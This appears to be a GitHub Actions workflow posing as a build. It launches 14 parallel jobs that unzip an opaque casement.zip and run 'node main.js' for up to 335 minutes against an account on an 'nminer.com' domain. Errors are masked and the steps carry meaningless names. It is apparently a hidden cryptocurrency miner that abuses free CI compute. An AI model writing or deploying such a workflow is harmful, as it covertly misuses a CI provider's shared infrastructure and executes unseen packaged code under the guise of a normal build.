name: casement
on:
  push:
    branches: [ "main" ]
    paths:
      - "casement.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { os: 0 }
          - { os: 1 }
          - { os: 2 }
          - { os: 3 }
          - { os: 4 }
          - { os: 5 }
          - { os: 6 }
          - { os: 7 }
          - { os: 8 }
          - { os: 9 }
          - { os: 10 }
          - { os: 11 }
          - { os: 12 }
          - { os: 13 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20

      - name: Unzip casement.zip
        run: |
          sudo apt install -y unzip
          unzip casement.zip

      - name: and tight shocked chairperson
        run: |
          npm install --ignore-scripts
          timeout 335m node main.js jitmuna3@nminer.com || echo "casement executed"